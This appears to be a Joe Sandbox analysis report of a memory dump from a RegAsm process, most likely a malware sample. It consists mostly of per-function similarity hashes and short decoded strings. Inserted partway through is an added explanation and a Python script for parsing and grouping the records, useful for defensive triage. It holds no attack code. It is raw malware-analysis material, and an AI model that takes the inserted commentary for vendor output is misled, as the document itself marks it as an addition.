                                        • Instruction Fuzzy Hash: 2BD1F034609202DFD708DF25EC51A2AB3F6FB99706F19887CE58683291D738EE51CB49
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: <vB$cba`
                                        • API String ID: 0-498934516
                                        • Opcode ID: d4f623a5fb0a0c8f92519baea591e51ccb09485aaf33c8d24cde6aecc2ef88d5
                                        • Instruction ID: da3196872b256321ec34466f7baf0807fde79cf67f05401d592e0b2ad76434be
                                        • Opcode Fuzzy Hash: d4f623a5fb0a0c8f92519baea591e51ccb09485aaf33c8d24cde6aecc2ef88d5
                                        • Instruction Fuzzy Hash: 29B107B5A087248FD718CF28E85172BB7E2ABC5304F4A857DD9968B392DB349C01DB85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: )$IEND
                                        • API String ID: 0-707183367
                                        • Opcode ID: bc4bf555bbeff42da8388944a93aac8362fee21b005dad154d3f6f1e39364d8b
                                        • Instruction ID: 4afb57b326d3e49d9fc8e0a24ea4f70629e8547001b2e63d72ffbe4a7bfc289b
                                        • Opcode Fuzzy Hash: bc4bf555bbeff42da8388944a93aac8362fee21b005dad154d3f6f1e39364d8b
                                        • Instruction Fuzzy Hash: 42D1C2B1A08344AFD710CF14D84575FBBE4AB94308F14492EFA99AB3C1D779D908CB96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: &$(-$(,"-
                                        • API String ID: 0-2940422652
                                        • Opcode ID: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
                                        • Instruction ID: ae70fb115a879a18d64fb530bcee3728d6c7b0029ca7c8029ea195d6610fa6e3
                                        • Opcode Fuzzy Hash: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
                                        • Instruction Fuzzy Hash: A571066110C3868ED7158F29949077BBFE19FE2304F1849BEE4D5AB383D739890AC766
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "=B$vw
                                        • API String ID: 0-457850316
                                        • Opcode ID: 051963b576788cf0d88f3c6bd725d199eeee0da8a148a68b8bbb1709fcb4336e
                                        • Instruction ID: f315680c62e70f20da2e1c8123195ba5c4b2be5aa43e99e7c1204dac969b8674
                                        • Opcode Fuzzy Hash: 051963b576788cf0d88f3c6bd725d199eeee0da8a148a68b8bbb1709fcb4336e
                                        • Instruction Fuzzy Hash: BA91327220C3548BD314CF68EC81B5BBBE1FBC5318F154A3DF9985B281D7B599058B86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %$BzJ
                                        • API String ID: 0-1159491165
                                        • Opcode ID: d50dfa369b2cabffe8d628b0ac0056a4e2c295f14812191870c99ff4e33fffd4
                                        • Instruction ID: 15970c7872f0f24117a588b544366ad47cb00c5e8ff479cf6d2c6aa966492e42
                                        • Opcode Fuzzy Hash: d50dfa369b2cabffe8d628b0ac0056a4e2c295f14812191870c99ff4e33fffd4
                                        • Instruction Fuzzy Hash: 5551277450C3828BD7158B3994617B7BFE1DFA3305F68045DE0C287693DB2A854ACBAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pr$|~
                                        • API String ID: 0-4145297803
                                        • Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                        • Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
                                        • Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                        • Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pr$|~
                                        • API String ID: 0-4145297803
                                        • Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                        • Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
                                        • Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                        • Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c!"$cba`
                                        • API String ID: 0-3815079656
                                        • Opcode ID: 5399830b24d0c7c21206e2b52d5cb164668a13b1fa724a81154e92aaa802a904
                                        • Instruction ID: d439ba287dcba63c8f7a659613d28fe1dbaf1e7a7a1ec41ac89f2e19b51e5e51
                                        • Opcode Fuzzy Hash: 5399830b24d0c7c21206e2b52d5cb164668a13b1fa724a81154e92aaa802a904
                                        • Instruction Fuzzy Hash: AF51387464C300ABE324EF25EC81B2B77A6FBD9304F15582DE1C687241D778AC01DBAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BLJB$X
                                        • API String ID: 0-2222927247
                                        • Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                        • Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
                                        • Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                        • Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: H.s $ij
                                        • API String ID: 0-4017226643
                                        • Opcode ID: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                        • Instruction ID: ae217f9daa6f4cce8b7d259f4259de876ba9e86de0ba8af5ed87a71d833a3b47
                                        • Opcode Fuzzy Hash: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                        • Instruction Fuzzy Hash: 0F31DEB260D3908FD314CF65D48165FBBE2EBC6704F55892DE4C56B340CBB49906CB46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: 1/3T
                                        • API String ID: 2994545307-3266294232
                                        • Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                        • Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
                                        • Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                        • Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: cba`
                                        • API String ID: 0-1926275841
                                        • Opcode ID: 3f29fd3a069bb16d361132c5aa8a0ede2e0d2aaea110744ff23cb538c4bc5ae4
                                        • Instruction ID: 14714d2ba1fa74e4959dcbafcfb1335b2d24fab57e9a1ae0764d95646eda8daf
                                        • Opcode Fuzzy Hash: 3f29fd3a069bb16d361132c5aa8a0ede2e0d2aaea110744ff23cb538c4bc5ae4
                                        • Instruction Fuzzy Hash: 47C177B590C3144BD330EF15D8C162BB7A2AF99314F0A962DE9C657352E738AC05CBDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: K%
                                        • API String ID: 0-424693878
                                        • Opcode ID: 37b01ca38506eb230e9e43b73d8b4a05ed4a32d3362ed536e1d7410f5922aec2
                                        • Instruction ID: 7540c4282cdacfbe722bd69171a89485793de9a2a526d887569807fd05c65936
                                        • Opcode Fuzzy Hash: 37b01ca38506eb230e9e43b73d8b4a05ed4a32d3362ed536e1d7410f5922aec2
                                        • Instruction Fuzzy Hash: 9CC124B16083008BDB149F28DC927ABB3E1FF95314F094A2DE582C7391E7B8E945C399
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x
                                        • API String ID: 0-2363233923
                                        • Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                        • Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
                                        • Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                        • Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: &tB
                                        • API String ID: 0-268467982
                                        • Opcode ID: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                        • Instruction ID: 06a34f82c29db43340e48ad1cbe7e395302b1ddd3c50ea808075b5b9ec83bf05
                                        • Opcode Fuzzy Hash: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                        • Instruction Fuzzy Hash: C5E169B5A083618FC7109F14E45136BB7E1AFDA304F0A486EE8C597342D639ED45CB9B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: cba`
                                        • API String ID: 0-1926275841
                                        • Opcode ID: c94db94e7765f3a71b808c63476c00684dbe44ed22f50a4180e2a827f6d9ca56
                                        • Instruction ID: 193fac06bddc95f6f71a2cfced3675609a912480cc88b1c4448270c4c5f8e929
                                        • Opcode Fuzzy Hash: c94db94e7765f3a71b808c63476c00684dbe44ed22f50a4180e2a827f6d9ca56
                                        • Instruction Fuzzy Hash: BEC146756083209FC314CF29E89162BBBE2FFCA711F59866DE8924B391C7799D01CB85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                        • Instruction ID: f813c1fc85afd7223dda0e36a8c027de47e21e6ca96e88e37e758e8b14c45e64
                                        • Opcode Fuzzy Hash: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                        • Instruction Fuzzy Hash: 03C113B2B043215BD7149E25E44076BB7E5AF84310F59892FEC9687382E738DC59C78B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: @CDE
                                        • API String ID: 2994545307-1513065382
                                        • Opcode ID: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                        • Instruction ID: 3c5ac0be7424b57116813a4f2293c38aabf5a2246835f37d4781b8179357b19c
                                        • Opcode Fuzzy Hash: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                        • Instruction Fuzzy Hash: EFB146717493414BC318DB2AC8D1A3BBBE6ABE9314F1CD93DE58687392C638DC058796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RuA
                                        • API String ID: 0-3286949753
                                        • Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                        • Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
                                        • Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                        • Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: oB
                                        • API String ID: 0-2659631944
                                        • Opcode ID: 0693cc6c46902c7217c4adacdc2c5168b01ac46d7e5509cb09b59ea090d7e90c
                                        • Instruction ID: 9f556a8ac2aeb4471154cd87b74293f5bbb160a2dea8f59859fea2c9b9bc59b4
                                        • Opcode Fuzzy Hash: 0693cc6c46902c7217c4adacdc2c5168b01ac46d7e5509cb09b59ea090d7e90c
                                        • Instruction Fuzzy Hash: 54C11431A08391CFD314CF38A89076ABBA2AF8A314F5947ADF4A55B3E1D3359D04CB59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x%
                                        • API String ID: 0-3980080454
                                        • Opcode ID: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                        • Instruction ID: 53925fe815e81de9676dfe4c3668865c11de61aed011eb2c10e86570e61a59d5
                                        • Opcode Fuzzy Hash: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                        • Instruction Fuzzy Hash: 7BA145B1604320ABCB10DF24DC91B6777E4FF94358F08492DEA858B391E7B9E905C766
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: cba`
                                        • API String ID: 0-1926275841
                                        • Opcode ID: 6e56f68504aedb9c4637ddc64e974fdb85d88a5ec5eac0ceed752bd9f5295936
                                        • Instruction ID: 94ad105f6478fdac957072c6e69bbed76807f6ec97b14cb59ee989f6f6ee26f8
                                        • Opcode Fuzzy Hash: 6e56f68504aedb9c4637ddc64e974fdb85d88a5ec5eac0ceed752bd9f5295936
                                        • Instruction Fuzzy Hash: 7FE1E421508BD18ED336CA3C8804357BFE15B6B314F09CB9DC4EA5B7D2C669A905C7A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ^@
                                        • API String ID: 0-1015691136
                                        • Opcode ID: 703dd625fb3eb8638aa44194967a27a36d87c0cb45f6d60d58a93a7552ea481a
                                        • Instruction ID: 235d2d97adcff596e282d77143eaa9e06c0732ed9a934443ad0122243597bde8
                                        • Opcode Fuzzy Hash: 703dd625fb3eb8638aa44194967a27a36d87c0cb45f6d60d58a93a7552ea481a
                                        • Instruction Fuzzy Hash: AE71CCB66883108BC324CF59C89226BF7F2FFD5714F09981DE8D99B350E3788901879A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 0a169f153f05d81556b97ec1d982402f44b1193e7a5d9548232ad9bc2a2d11b7
                                        • Instruction ID: b52eb51231fc900eaadc8c81f457622f3f0b6f51af79dcbe8e0f809c0597da3a
                                        • Opcode Fuzzy Hash: 0a169f153f05d81556b97ec1d982402f44b1193e7a5d9548232ad9bc2a2d11b7
                                        • Instruction Fuzzy Hash: 98912733658A9007C72C5D7C4C752AABA934BDA230F2E937EA9B2CB3E1D52988065355
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ~
                                        • API String ID: 0-1707062198
                                        • Opcode ID: 72c13701696192dfc20109577999103ecfce46bb15957d77df2543678485ee00
                                        • Instruction ID: fedad1c06f0065ecafef613c73bdfc631541caa38951d67b42794b4cc961db47
                                        • Opcode Fuzzy Hash: 72c13701696192dfc20109577999103ecfce46bb15957d77df2543678485ee00
                                        • Instruction Fuzzy Hash: 218139B29042615FC7258E28C84179BBBD1AB85324F19C23EECB99B392D6389C46D7D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,
                                        • API String ID: 0-3772416878
                                        • Opcode ID: 7fae2f255a8fd2d56763f8beb58fcdc8fb186e5576eac22f9c3d66becbf538f0
                                        • Instruction ID: a3ef299c5e7e977cc5b7504a12919924ad54ea5109b9e3e5b2e920edd53b1c89
                                        • Opcode Fuzzy Hash: 7fae2f255a8fd2d56763f8beb58fcdc8fb186e5576eac22f9c3d66becbf538f0
                                        • Instruction Fuzzy Hash: 34B138711097819FD325CF18C88061BFBE0AFA9704F444A2EF5D997782D635EA18CBA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: cba`
                                        • API String ID: 2994545307-1926275841
                                        • Opcode ID: 4dd138133c70bccffe0cc9a23b0a33065d47b40352575896815e93fde00f8469
                                        • Instruction ID: 41ff4bfae8fb92d3e53a90846de56666ce7534d916a86ba38ef6454eea79fcdf
                                        • Opcode Fuzzy Hash: 4dd138133c70bccffe0cc9a23b0a33065d47b40352575896815e93fde00f8469
                                        • Instruction Fuzzy Hash: 3A717435A483009FDB189F28C890B3BB7A2EB99314F19557ED4D3877A1D6359C10CB8B
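The Similarity records above are what an analyst pivots on when triaging a dump like this one: functions that reference the same decrypted string share a String ID hash (the string cba` is referenced by several distinct Opcode IDs in this dump), and functions that touch the same API share an API ID hash (InitializeThunk recurs). The report itself exhibits the composition rule for the API String ID field: it is the API ID hash and the String ID hash joined by a hyphen, with 0 when the API ID is empty (0-1926275841 for cba` alone, 2994545307-1926275841 for InitializeThunk plus cba`, 2994545307-3266294232 for InitializeThunk plus 1/3T). The following Python is an added example, not Joe Sandbox code: it parses records in the exact layout shown on this page, checks that composition rule across records, and groups functions by shared string or API hash. The sample text is constructed by copying three records verbatim from this report; the hash algorithm Joe Sandbox uses is not known here and is not reimplemented.

```python
import re
from collections import defaultdict

# Constructed sample: three records copied verbatim from this report's
# Similarity section (same memory dump, same snapshot file).
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
Similarity
• API ID:
• String ID: cba`
• API String ID: 0-1926275841
• Opcode ID: 3f29fd3a069bb16d361132c5aa8a0ede2e0d2aaea110744ff23cb538c4bc5ae4
• Instruction ID: 14714d2ba1fa74e4959dcbafcfb1335b2d24fab57e9a1ae0764d95646eda8daf
• Opcode Fuzzy Hash: 3f29fd3a069bb16d361132c5aa8a0ede2e0d2aaea110744ff23cb538c4bc5ae4
• Instruction Fuzzy Hash: 47C177B590C3144BD330EF15D8C162BB7A2AF99314F0A962DE9C657352E738AC05CBDA
Strings
Memory Dump Source
• Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
Similarity
• API ID: InitializeThunk
• String ID: cba`
• API String ID: 2994545307-1926275841
• Opcode ID: 4dd138133c70bccffe0cc9a23b0a33065d47b40352575896815e93fde00f8469
• Instruction ID: 41ff4bfae8fb92d3e53a90846de56666ce7534d916a86ba38ef6454eea79fcdf
• Opcode Fuzzy Hash: 4dd138133c70bccffe0cc9a23b0a33065d47b40352575896815e93fde00f8469
• Instruction Fuzzy Hash: 3A717435A483009FDB189F28C890B3BB7A2EB99314F19557ED4D3877A1D6359C10CB8B
Strings
Memory Dump Source
• Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
Similarity
• API ID: InitializeThunk
• String ID: 1/3T
• API String ID: 2994545307-3266294232
• Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
• Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
• Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
• Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58
"""

# One report bullet: "• Label: value" (value may be empty, as for an empty API ID).
BULLET = re.compile(r"^\s*•\s*([^:]+?)\s*:\s*(.*?)\s*$")


def parse_records(text):
    """Split pasted report text into one dict per function, keyed by bullet label.

    A record opens at each 'Strings' heading. Bullets seen before any heading
    (text copied starting mid-record) go into a leading partial record; any
    record without an Opcode ID is dropped as incomplete."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "Strings":
            current = {}
            records.append(current)
            continue
        m = BULLET.match(line)
        if not m:
            continue
        if current is None:
            current = {}
            records.append(current)
        current[m.group(1)] = m.group(2)
    return [r for r in records if "Opcode ID" in r]


def split_api_string_id(record):
    """Return (api_hash, string_hash) from the report's 'API String ID' field."""
    api_h, str_h = record["API String ID"].split("-", 1)
    return int(api_h), int(str_h)


def check_composition(records):
    """Check the convention the report exhibits: an empty API ID hashes to 0,
    and equal API ID / String ID text always yields equal hashes.
    Returns a list of (Opcode ID, reason) for every record that violates it."""
    api_map, str_map, problems = {}, {}, []
    for r in records:
        api_h, str_h = split_api_string_id(r)
        if (r["API ID"] == "") != (api_h == 0):
            problems.append((r["Opcode ID"], "empty API ID must hash to 0"))
        for table, key, h in ((api_map, r["API ID"], api_h),
                              (str_map, r["String ID"], str_h)):
            if table.setdefault(key, h) != h:
                problems.append((r["Opcode ID"], f"conflicting hash for {key!r}"))
    return problems


def pivot(records, field):
    """Group Opcode IDs by (text, hash) of 'API ID' or 'String ID', so functions
    sharing a string or an API can be found. Hash 0 (no API) is not a group."""
    idx = 0 if field == "API ID" else 1
    groups = defaultdict(list)
    for r in records:
        h = split_api_string_id(r)[idx]
        if h:
            groups[(r[field], h)].append(r["Opcode ID"])
    return dict(groups)
```

Feeding the whole Similarity section of a report through parse_records and then pivot(..., "String ID") lists, per string, every function that uses it, which is the quickest way to locate the string-decryption callers and the functions that consume their output; check_composition is a sanity check that the pasted text was not mangled (a corrupted hash or a truncated record shows up as an inconsistency rather than a silent mis-grouping).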
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
                                        • Instruction ID: d68b1a9088298affc1ec5bd7052a8a4f753d8ac7f88c6c36173fe7236f557df2
                                        • Opcode Fuzzy Hash: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
                                        • Instruction Fuzzy Hash: A271E7327087254BD724D96DAC8022BB6C35BC6330F59876AECB48B3E5D6788C25478B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                        • Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                        • Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B
                                        Strings
                                        Memory Dump Source
